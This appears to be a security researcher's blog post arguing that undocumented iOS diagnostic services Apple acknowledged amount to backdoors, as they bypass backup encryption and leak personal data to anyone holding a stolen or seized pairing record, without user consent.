In a response from Apple PR to journalists about my HOPE/X talk, it looks like Apple might have inadvertently admitted that, in the most widely accepted sense of the word, they do indeed have backdoors in iOS, however claim that the purpose is for “diagnostics” and “enterprise”.
The problem with this is that these services dish out data (and bypass backup encryption) regardless of whether or not “Send Diagnostic Data to Apple” is turned on or off, and whether or not the device is managed by an enterprise policy of any kind. So if these services were intended for such purposes, you’d think they’d only work if the device was managed/supervised or if the user had enabled diagnostic mode. Unfortunately this isn’t the case and there is no way to disable these mechanisms. As a result, every single device has these features enabled and there’s no way to turn them off, nor are users prompted for consent to send this kind of personal data off the device.
Apple’s seeming admission to having these, however legitimate a use they serve Apple, unfortunately have opened up some serious privacy weaknesses as well. We know, from the Snowden leaks via Der Spiegel, that NSA has penetrated target desktop machines to later access iPhone features. We also know that desktop machines are often seized by law enforcement and with that pairing record data, can access the data on the device using these services – even if backup encryption is turned on. Pairing records can be stolen a number of different ways, ranging from a shared coffee shop computer to an ex-lover whose computer you used to trust, leaving your phone unlocked at a bar (Apple should know something about this), or countless other scenarios – all giving the attacker perpetual access to your device via USB and usually WiFi until you wipe the device. It is only recently that iOS even added a trust dialog; prior to this, your device would automatically pair with anything that you plugged it into.
Obviously, Apple realized that pairing in and of itself offered very little security, as they added backup encryption to all backups as a feature – something that also requires pairing to perform. So Apple doesn’t trust pairing as a “security” solution either. And for good reason: it wasn’t designed to be secure. It is not two factor; it is not encrypted with a user paraphrase; it is simply “something you have” that gives you complete unfettered access to the phone. And it can be had as easily as copying one file, or created on the fly via USB. It can be used if law enforcement seizes your computer; it can be stolen by someone hacking in; it is by all means insecure. But even with the pairing record, I would have expected the data that comes off my device to be encrypted with the backup password, right? These services completely bypass this.
I understand that every OS has diagnostic functions, however these services break the promise that Apple makes with the consumer when they enter a backup password; that the data on their device will only come off the phone encrypted. The consumer is also not aware of these mechanisms, nor are they prompted in any way by the device. There is simply no way to justify the massive leak of data as a result of these services, and without any explicit consent by the user.
The data these services leak is of an extreme personal nature. There is no notification to the user. Stateful cache data is never supposed to come off the phone, even in a backup. A better diagnostic tool would have been engineered to respect the user, prompt them like applications do for access to data, and respect backup encryption. Tell me, what is the point in promising the user encryption if there is a backdoor to bypass it?